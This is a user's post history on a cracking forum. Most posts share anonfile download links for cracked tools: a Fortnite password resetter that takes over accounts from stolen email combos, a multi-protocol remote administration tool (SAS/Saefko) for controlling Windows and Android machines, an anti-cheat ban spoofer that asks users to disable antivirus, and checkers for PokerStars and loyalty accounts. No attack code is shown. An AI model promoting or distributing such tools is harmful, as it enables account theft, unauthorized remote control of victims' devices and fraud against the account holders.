ForlaxPy

Members
  • Content Count

    732
  • Last visited

Everything posted by ForlaxPy

  1. ForlaxPy

    Me and Forlax

    I did? :feelsabdulman:
  2. [align=center]Basically what this program does is Resets the password of the fortnite account from email access accounts (combo) Load an email access combo And proxy / proxyless both supported Then just start it, and it will reset passwords from the email access accounts automatically It's fast enough, and using proxy will slightly increase the speed! Currently No capture has been added (Lazy to do) :/ You can create your own pass while reseting GIF Not so HQ GUI but it does the work [/align] [align=center]Download Program open it it will give you hwid provide me the hwid in the comment Enter Cracked.To Auth https://cracked.to/auth.php[/align] Thanks to @Devil for leaking it :ezy: [hide] Download: https://anonfile.com/qdN2g6veb7/FortniteReseterByLEFTCRACKER_zip [/hide]
  3. lol that's not allowed the tool is for sale here :kek:
  4. Actually the Disinfector role is harder that what y do think. You're dealing here with hardcodded smart malwares fully hidden by crypters, you will have to study the exe and run multiples test on it to see if it's actually stealing or logging something, it's not always the case that it drops something. It could be injecting it self when it runs and bunch of others options. It's not that easy to detect these so if you guys are willing to drop them online and scan then just forget about the role. I agree that the Disinfectors are kinda lazy and they do the necessaries tests and that something I pmed floraiN about few weeks ago. So in short we need real malwares analysers, real one that could actual reverse the way hows a program works and to study it or at least set up a dedicated Virtual Environment and check how these programs behaves on the OS to make sure that it's clean.
  5. [align=center] [/align] Download: [hide] https://anonfile.com/f4N5Mbubb3/PokerStars_Checker_-_Cracked.To_zip [/hide]
  6. The Error Message already explains everthing. You will need to create that missing txt file
  7. Fixed OP files and Patched few more Saefko Auth parts. Should work fine Right now @Null22
  8. Install Java without it it won't work. https://javadl.oracle.com/webapps/download/AutoDL?BundleId=236857_42970487e3af4f5aa5bca3f542482c60
  9. Look who's talking. You was actually stealing the bots from your users by sending them to your cpanel I had to clear your shitty tool from that you better thank me.
  10. This requires your Auth Key and you need to be a Premium Member, Infinity or Supreme [align=left]This is "a multi protocol multi operating system" remote adminstration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first Unlimited number of machines to control. Extreme reliability. Android and Windows control at the same time. No port forwarding "IRC,HTTP". [/align] [align=left]How it works ? First the agent connect to HTTP server the login into some random IRC servers ,then store the usernames and server in the database throgh HTTP.affter that the attcker can load these server and connect to the agent throgh IRC , then to enable TCP the attacker send TCP command throgh IRC to start on demand TCP connection.[/align] [align=left]Does it require anything? Yes. .NET framework 4.5 or higher. Java 1.8 or above. And for TCP connection you need to port forward port "1616"[/align] Quick Setup: [video=youtube] More Details and FAQ: [hide] DL: https://anonfile.com/l2Oc7cu6b0/SAS_Cracked_Fixed_zip (Fixed version) VirusTotal: https://www.virustotal.com/#/file/68964ce0ac60a31f6ef96ac3c5e31ae5988cba95b2e4752b3b405cae6b82e7eb/detection Get the auth code from here https://cracked.to/auth.php [/hide] shoutout to @ItsJahBoyPlank for leaking the files!
  11. [hide] DL: https://anonfile.com/20R4sbudb8/DorkWorker_Cracked_zip VirusTotal: https://www.virustotal.com/#/file/35add6a55bb72d1bc88d0cfe514b9fd79ce75caca3bee2bfb62ae36542ec82f9/detection [/hide]
  12. Most of checkers posted in here and around cracking forums are net or native based (dedicated for windows platforms). But you could find some Py checkers. Actually working on these.
  13. Welcome aboard buddy! Enjoy yourself between us, just don't be a Leecher.
  14. DeluxeUnban [align=center] Temporarily unban your PC from Fortnite and other games (not all though, check #status). Also works as a normal HWID spoofer. Works for both EAC & BE. Temporarily meaning you will need to respoof if you restart your PC. :ezy: No more bus kicks or ingame kicks. EVENTUALLY YOU MAY BE BANNED, JUST RESPOOF AND MAKE ANOTHER ACCOUNT, KEEP PLAYING :kek: How it works? -Tool Owner- BEFORE RUNNING PLEASE TURN REAL-TIME PROTECTION OFF OR SPOOFER WON'T WORK! [/align] Run the tool (DeluxeUnban Cracked.exe) [align=center] Auth [/align] [align=center] Customize it as you like[/align] [align=center] Then click Spoof And wait for it to get the job done for you -Tool Owner- I don't take responsiblity of anything wrong that may happen to you as this is a spoofer it changes some of your pc data temporarly. [hide] DL: https://anonfile.com/C3z410tdb6/DeluxeUnban_zip VirusTotal: https://www.virustotal.com/#/file/0a16f68df289af5de147ae9282d219c79cad3ff27c2e685f1a4a0808d2fc98d7/detection [/hide] [/align]
  15. Krispy Kreme Fortune [hide] DL: https://anonfile.com/Qbae17tab3/Krispy_Kreme_Fortnute_zip VirusTotal: https://www.virustotal.com/#/file/16e765da600df68e0bd924a72b9aaf4a41acb012429619c4b59999855f99d756/detection [/hide]
  16. Nectar fortune is like the new morrisons make easy money and get free items [hide] DL: https://anonfile.com/o1K3y4t4bb/Nectar_Checker_zip VirusTotal: https://www.virustotal.com/#/file/90a2e3a8bfbf8f135d0074acd219280157c545a36a7d89581dd84a89b8d7b1fe/detection [/hide]